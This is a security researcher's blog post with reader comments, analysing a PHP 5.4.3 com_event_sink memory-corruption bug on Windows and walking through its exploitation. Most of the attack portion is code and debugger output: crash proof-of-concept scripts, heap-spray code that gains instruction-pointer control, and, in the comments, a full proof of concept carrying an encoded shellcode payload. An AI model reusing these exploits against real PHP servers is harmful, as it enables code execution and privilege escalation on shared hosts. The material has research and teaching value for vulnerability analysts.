Fb1h2s aka Rahul Sasi's Blog

Web-App Remote Code Execution Via Scripting Engines Part -1: Local Exploits PHP 0-day

14 Comments

fb1h2s

, 08-20-2012 at 07:07 PM (5872 Views)

This would be part-1 one of my C0C0n talk , where I demonstrated few PHP 0-days, Local and Remote . The entire concept of the talk was demonstrating attacks on WebApplications via scripting engines.

In a common Webapp test we manipulates Input , that a common end user controls and check for responses from the app. But since these data passed are processed by the PHP,ASP engines that are used to build these apps. We were fuzzing and trying to figure out issues in these engines that could be attacked by common user. My talk had two parts Local Attacks and Remote Attacks. Local attacks I demonstrated ways to do privilege escalation exploiting PHP and in Remote Attacks we mapped PHP functions that took arguments from remote users like File processing and Image Processing functions and demonstrated ways to exploit them.The entire presentation concentrated on PHP core Bugs.

Current post would be on PHP local attacks only [The first part of the Talk] , since once of these issue is already out, it's time to blog.

I would put down some intro on PHP architecture, the history of PHP local attacks and exploits that were commonly used in the wild for privilege escalation followed by my our own 0-days [The way how I delivered my Talk].

Note: The images put up here are not created by me, at the time of making PPTs I downloaded them via google images, and now I have no clue whom to give credit.

Web Application How Stuffs Work.

1) User[browser] Send Inputs to Webapp -
2) Http Server catches and
3) Passes it to Web App -->
4) WebApp send it to Scripting engine to process it.

PHP Architecture :

These digrams are good enough to explain php Architecture in Detail, instead of me writing about them in detail.

1)

PHP + Apache Security Architecture :

1) So if we could execute code in context of PHP , you would be able to break out many restrictions.
2) Should be able to get shell access to hardned PHP Hosts.
3) Shared hosting Windows servers are affected the most.
4) These sort of bugs are rated 10/10 in a CVE score by PHP.

Why PHP Local Exploits.

1) For Privilege Escalation
2) Code Execution in Protected Environments
3) Bypassing Security Restrictions

History of PHP Local Exploits for Bug Hunters:

1) PHP Symlink Exploit
2) PHP Nginx Exploit
3) _php_stream_scandir
4)CVE-2011-3268 [crypt function]
5) PHP XSLT Injection
http://xhe.myxwiki.org/xwiki/bin/vie...plication_PHP5

The best of PHP bug hunts were done by i0nic and team for there "Month of PHP Security" in 2007 and 2010 . About 60 security issues were identified and few POCs were released.

Or you coud Browse this well organized archive . PHP : Products and vulnerabilities

In April 2012 I found few local security issues , that were added to CoCon CFP , which later was identified by condis PHP <= 5.4.3 (com_event_sink) Code Execution Proof of Concept - CXSecurity WLB independently . Now that this issue is Public , I will put down my analysis notes on getting code execution on this bug. Current bug only affect PHP Windows.

PHP 5.4.3 Com_event_sink 0-day:

The Vulnerable Function:

PHP Provides a module to interact with COM and .Net (Windows). In that com_event_sink is used the following way.

It allows users to call a COM instance , in current case [IE] and interact with it.
Note: This feature is handy if the server you have access has disallowed other mechanism to download files to it like .

The following code will open an IE instance and download the webpage Google. The function com_event_sink takes three arguments.

1) --> $ie = new COM("InternetExplorer.Application");

Address of the Com object to be interacted

2) --> Sink Object

3) -- > Sink Interface

com_event_sink($ie, $sink, "DWebBrowserEvents2");

PHP Code:

<?php class IEEventSinker { var $terminated = false; function ProgressChange($progress, $progressmax) { echo "Download progress: $progress / $progressmax\n"; } function DocumentComplete(&$dom, $url) { echo "Document $url complete\n"; } function OnQuit() { echo "Quit!\n"; $this->terminated = true; } } $ie = new COM("InternetExplorer.Application"); // note that you don't need the & for PHP 5! $sink = new IEEventSinker(); com_event_sink($ie, $sink, "DWebBrowserEvents2"); $ie->Visible = true; $ie->Navigate("http://www.google.com"); while(!$sink->terminated) { com_message_pump(4000); } $ie = null; ?>

The Bug:

The first argument is the adress of the COM object to load and it's controlled by the user. And no validation is done on the address, and this is address is directly used. [Very Bad logic]

PHP Code:

$ie = new COM("InternetExplorer.Application"); // note that you don't need the & for PHP 5! $sink = new IEEventSinker(); com_event_sink($ie, $sink, "DWebBrowserEvents2");

POC

PHP Code:

<?php $buffer = str_repeat("B", 1000); $vVar = new VARIANT(0x43434343); // We controll this $vVar2 = new VARIANT(0x41414141); // com_event_sink($vVar, $vVar2 , $buffer ); ?>
Code:
(310.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00372ad0 edx=0114dd88 esi=43434343 edi=0114d9b8
eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll - 
php5ts!php_strftime+0xadc:

102f59bd 8b06            mov     eax,dword ptr [esi]  ds:0023:43434343=????????  
102f59bf 8d4dd4          lea     ecx,[ebp-2Ch]
102f59c2 51              push    ecx
102f59c3 53              push    ebx
102f59c4 53              push    ebx
102f59c5 56              push    esi
102f59c6 ff5010          call    dword ptr [eax+10h]
Cool we control ESI fully and instruction crashes since Mov to EAX fails since ESI point to an Invalide Address

----> mov eax,dword ptr [esi] ds:0023:43434343=????????

And EDI holds third argument , enough to hold some shellcode.
Code:
0:000> d edi
0114d9f8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da08  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da18  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da28  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da38  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
Code Execution [Exploitation]:

*) We control ESI and there by could take control over EAX ,
*) if we put ESI with a valid address and fill that memory with an arbitary mem adress then EAX would be in our hands.
*) And at 102f59c6 call dword ptr [eax+10h] , we can easily control EIP , since we control EAX and there by could make the call land any where we want [voila] .
*)So we need to spray with two different values one value for Controlling EAX and guiding [CALL] instruction to a valid adress space and another to control [EIP] and get complete control over the program.

In short :

$EIP="AAAA"; //JMP EDI
$EAX="BBBB " -10h;
$spray = $EIP.$EAX;

1) Do some spray take control of EAX .
2) Make the adress [Adress -10h ] since it's CALL EAX+10h.
3) So fill ESI memory with "\x34\x43\x42\x41"

PHP Code:

<?php $spray = str_repeat("\x34\x43\x42\x41",0x100); //We wann make EAX = 41424343 so l-india. echo strlen($spray); $deodrant=""; for($i=0;$i<0x4b00;$i++) { $deodrant.=$spray; } $terminate = "T"; $u[] =$deodrant; $r[] =$deodrant.$terminate; $a[] =$deodrant.$terminate; $s[] =$deodrant.$terminate; $vVar = new VARIANT(0x048d0000+180); //We control this //$buffer = str_repeat("B",200); $buffer = "\x41\x42\x43\x44\x90\x90\x90\x90\xcc\xcc\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; $var2 = new VARIANT(0x41414242); com_event_sink($vVar,$var2,$buffer); ?>
Code:
(1fc.b7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41424334 ebx=00000000 ecx=00c1f9b0 edx=0114dbf0 esi=048d00b4 edi=0114dc48
eip=102f59c6 esp=00c1f978 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll - 
php5ts!php_strftime+0xae5:

102f59c2 51              push    ecx
102f59c3 53              push    ebx
102f59c4 53              push    ebx
102f59c5 56              push    esi
102f59c6 ff5010          call    dword ptr [eax+10h]  ds:0023:41424344=????????
Now spray with two different values one value for Controlling EAX and guiding [CALL] instruction to a valid adress space and another to control [EIP] and get complete control over the program.

PHP Code:

<?php $eip ="\x44\x43\x42\x41"; //$eip= "\x4b\xe8\x57\x78"; jmp edi $eax ="\x80\x01\x8d\x04"; $deodrant=""; $axespray = str_repeat($eip.$eax,0x80); //048d0190 echo strlen($axespray); //19200 ==4B32 4b00 for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++) { $deodrant.=$axespray; } $terminate = "T"; $u[] =$deodrant; $r[] =$deodrant.$terminate; $a[] =$deodrant.$terminate; $s[] =$deodrant.$terminate; $vVar = new VARIANT(0x048d0000+180); $buffer = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; $var2 = new VARIANT(0x41414242); com_event_sink($vVar,$var2,$buffer); ?>

And Voila EIP ="woot woot"
Code:
(cb0.7d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=048d0180 ebx=00000000 ecx=00c1f9b0 edx=0114dbc8 esi=048d00b4 edi=0114dc20
eip=41414141 esp=00c1f974 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
Now you know it's pretty easy , and you know where the shellcode is and things are pretty obvious.

> !load byakugan
>!jutsu searchOpcode jmp edi

Code with a simple "Message Box " shellcode form our friend Atul

Next Part of the Blog Would be on the Remote PHP Exploits, might have to wait a long time till things get patched up.

I have build a Fully Functional Exploit with DEP Bypass, am not putting it here [even though it's pretty obvious on how to form this post]. But who ever wan't to play with it for learning purposes I could share it.

Rashid Bhat has produced a Windows all platforms reliable exploit for this bug.

http://www.garage4hackers.com/blogs/...windows-7-578/

Share
- Share this post on
- Digg
- Del.icio.us
- Technorati
- Twitter

prashant_uniyal, ajaysinghnegi and amutu like this.

Tags: php 5.4.3 exploit, php exploit

Categories: ‎ Uncategorized

Email Blog Entry

« Prev Main Next »

Comments

41.w4r10r - 08-20-2012 07:31 PM
waiting for RCE blog....
anyways you can PM me RCE sploit :P
[s] - 08-20-2012 08:08 PM
Hi , its look good one
In my case it is getting Ddosed ! Application getting crashed .. In my system stack is starting from 0x021F2351 and tried put some garbage on the stack so that ECX can be 0x41414141.
Code:

$EAX = 0x021F2351; $stack = str_repeat("x41", 0x1000000); class w00t { } com_event_sink(new Variant($EAX), new w00t(), array());
For remote i think this will work !
Code:

$ie->Visible = true; $ie->Navigate($_post['anyvar']); while(!$sink->terminated) { com_message_pump(4000);
PS:Remote is Not tested *
fb1h2s - 08-20-2012 08:29 PM
I tested it only on Win Xp sp2 . Others it would vary
[s] - 08-20-2012 09:04 PM
got ddosed on the following version !

PHP 5.3.8 + Windows XP SP3 Professional PL
fb1h2s - 08-20-2012 10:39 PM
@[S] here I haven't provided the exploit yet right, all you have here is the Analysis . A

[s] likes this.
amutu - 08-21-2012 05:52 PM
congratz for the excellent post! I'm interested in php internals also! perhaps you can help me explaining some stuff 'cause i'm having some problems....i can't wait to read your php presentation from cocon!
btw, you've managed to re-create the exploit for 5.3.9? or the RCE in 5.2? I'm working on that stuff...mostly 5.3.9

ps: where can i download your paper from? can't find it on the cOcOn website.

Updated 08-21-2012 at 05:56 PM by amutu
Rashid bhatt - 12-01-2012 09:55 AM
Hello

If you are not bypassing ASLR & DEP why do we need to spray?

Cheers!
fb1h2s - 12-01-2012 10:33 AM
The poc was made for Winxp | 2003 environments. And I don't know why u asked that question ?. Any way the current scenario if u check the instruction it was necessary for a spray to attain code execution.

Feel free to put up a poc with out spraying.

Cheers.
Rashid bhatt - 12-01-2012 08:47 PM
@fbihs2
hello brother ,

I think you got me wrong , when i said that "you are not bypassing ASLR & DEP" i knew that the exploit was not meant for environments other than winxp/2003, i thought why spraying was necessary when we can be precise in offsets,

anyways here is the POC without spraying

And listen bro i believe its quite possible that this vulnerability can be turned into a address disclosure bug! We need to talk about it contact me .

<?php
//$bu = str_repeat("B", 10);
$buffer = "\x10\xD4\x10\x01". "aaaaaaaa" . "aaaa" . "\x24\xd4\x10\x01" ."\xfc\xbb\x9d\x12\x3c\x8d\xeb\x0c\x5e\x56\x31\x1e \x ad\x01\xc3" .
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x44\xf9\ x a7\x54\x02" .
"\xda\x23\x57\x38\x90\xbb\xa9\x75\xb1\xc8\xbb\xb5\ x b1\xb9\x37" .
"\x3e\xb3\x59\xc3\x06\x34\xe9\xad\xa6\xcf\xdb\x69\ x e9\xd7\x56" .
"\x79\xac\xe6\x49\x82\xaf\x89\xe2\x11\x0b\x6e\x7e\ x ac\x6f\xe5" .
"\xd4\x07\xf7\xf8\x3e\xdc\x4d\xe3\x35\xb9\x71\x12\ x a1\xdd\x45" .
"\x5d\xbe\x16\x2e\x5c\x2e\x67\xcf\x6e\x6e\x74\x83\ x 15\xae\xf1" .
"\xdc\xd4\xe0\xf7\xe3\x11\x15\xf3\xd8\xe1\xce\xd4\ x 6b\xfb\x84" .
"\x7f\xb7\xfa\x71\x19\x3c\xf0\xce\x6d\x18\x15\xd0\ x 9a\x17\x21" .
"\x59\x5d\xcf\xa3\x19\x7a\x13\xd5\x62\x30\x23\x3c\ x b1\xbc\xd6" .
"\xb7\xfb\xd7\x96\x86\xf5\xcb\xf4\xfe\x95\xeb\x07\ x 01\x20\x56" .
"\xf3\x45\x4d\x81\x19\xca\x35\x2d\xf9\x7f\xd2\xc0\ x fe\x7f\xdd" .
"\x54\x45\x88\x4a\x0b\x29\xa8\xcb\xbb\x82\x9a\xe5\ x 5f\x8c\xaf" .
"\x8a\xfa\x3e\xd8\x31\x21\xb4\x51\x2f\x7f\x37\x34\ x b4\x09\x05" .
"\xe7\x0f\xa1\x2b\x45\xcc\x35\x37\x72\x7e\xd2\x26\ x 85\x81\xdd" .
"\xc0\x16\x06\x7a\x30\x81\x97\x1d\x55\x13\x30\xaf\ x f0\xe0\xb3" .
"\x1e\x21\x8e\x68\x45\xdf\x06\x73\xed\x87\x38\x54\ x ce\x5f\x74" .
"\xc7\x48\xbe\xee\x95\x3b\xad\xce\x31\xab\x01\x2f\ x a4\x5b\x11" .
"\x4a\x44\xf0\x90\x5d\x1c\x44\xf6\x4d\x94\xb4\xc7\ x bf\xf4\x65" .
"\x76\x12\x06\x59\x49\x52\xa8\xa5\xfc\x5a\x49\x5a\ x fe\x5a\x49" .
"\x5a";

$vVar = new VARIANT(0x0110D410); // We controll this
$vVar2 = new VARIANT(0xbadc0de); //

com_event_sink($vVar, $vVar2 , $buffer );
?>
fb1h2s - 12-02-2012 07:56 AM
Thanks for sharing the code and the showing intrest in the work.

But pardon me am not getting what ur talking about how u were able to get code execution.

In our case

$vVar = new VARIANT(0x0110D410); // We controll this

is not used directly for EIP but its the [ dword ptr [esi] ] .

Here is the debugging output form the code u shared.

Can u share the debugging output here please.

Thanks Again, looking forward for more fruitful discussion on this.
Cheers.

(ac0.ac4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00372ac8 edx=0114d9e0 esi=0110d410 edi=0114f230
eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll -
php5ts!php_strftime+0xadc:
102f59bd 8b06 mov eax,dword ptr [esi] ds:0023:0110d410=????????
0:000> u
php5ts!php_strftime+0xadc:
102f59bd 8b06 mov eax,dword ptr [esi]
102f59bf 8d4dd4 lea ecx,[ebp-2Ch]
102f59c2 51 push ecx
102f59c3 53 push ebx
102f59c4 53 push ebx
102f59c5 56 push esi
102f59c6 ff5010 call dword ptr [eax+10h]
102f59c9 8b45d4 mov eax,dword ptr [ebp-2Ch]

My tests were done on:
C:\wamp\www\phpbugs>php.exe -v
PHP 5.4.3 (cli) (built: May 8 2012 00:51:31)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans

Winxp SP 3
Rashid bhatt - 12-02-2012 04:11 PM
Hello ,

See this is where the things go wrong

============ module php5ts.dll =====================
102F59BD 8B06 MOV EAX,DWORD PTR DS:[ESI] << we control esi VARIANT(ESI) <<
102F59BF 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
102F59C2 51 PUSH ECX
102F59C3 53 PUSH EBX
102F59C4 53 PUSH EBX
102F59C5 56 PUSH ESI
102F59C6 FF50 10 CALL DWORD PTR DS:[EAX+10] << this is the place we can control EIP

Now, if we put a break-point at 0x102F59BD EDI happens to point towards $buffer variable

EAX 00000000
ECX 003628E8
EDX 0110DD78
EBX 00000000
ESP 00C1F9F8
EBP 00C1FA4C
ESI 0110D410 << this is what we can control using VARIANT
EDI 0110D410 <<< $buffer

EIP 102F59BD php5ts.102F59BD
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty 1.#QNAN00000000000000

$vVar = new VARIANT(0x0110D410); << (this address might vary on your system ) make it as EDI is

Now i have aligned the buffer in such a way that it will contain data in the following fashion

$buffer = "buffer_base" . "JUNK 12 BYTES" . "buffer_base + 10(hex)" . " SHELLCODE";

Here MOV EAX,DWORD PTR DS:[ESI] as we control ESI we can load EAX with base address of $buffer cause [$buffer] = base_addr_base

Later it happens to call a fucntion at + 10 offset of [eax] which in our buffer alignment points towards shellcode...

ps:Because the author this exploit has already assumed that DEP/ASLR are turned off by default on the testing machine, This exploit is not likely going to work on systems running such protections.

Thanks!
fb1h2s - 12-03-2012 06:21 AM
Hi bro that was helpfull thanks for letting me know there is an alternate way to solve this .
When I started my aim was to make the code work on Win XP, 2003[majority of php server] {irrespective of service packs obviously} platforms and when I first looked at the crash the first thought was to use a heap spray to achieve this. May be coz of the style I follow, so that u don't need to hardcode any adress and making it reliable.

The major issue with ur method is u need to know the exact adress of the following
1)edi
2)buffers base adress

and these two would vary even on each service packs?
Correct me if am wrong or you are able to solve that some way, lets keep this healthy discussion up.
Rashid bhatt - 12-03-2012 06:08 PM
hello brother

We only need need to know the buffer base address , edi is not required because edi by default points towards buffer. Moreover the kind of spray you are doing is not effective, in case of this exploit the heap has to be sprayed at 4 byte boundaries and at the same time we don't know if our $buffer will be aligned at odd or even byte boundary?

Also when you use JMP EDI trampoline definitely your heap spray will contain instructions which might have bad side effects! anyways ... lets work together on conversion of this exploit into an addresses disclosure bug!

Cheers!
fb1h2s - 12-05-2012 11:46 AM
Well in that case let be productive, we ill pick some other bug which is not public and try to make an exploit out of it what say.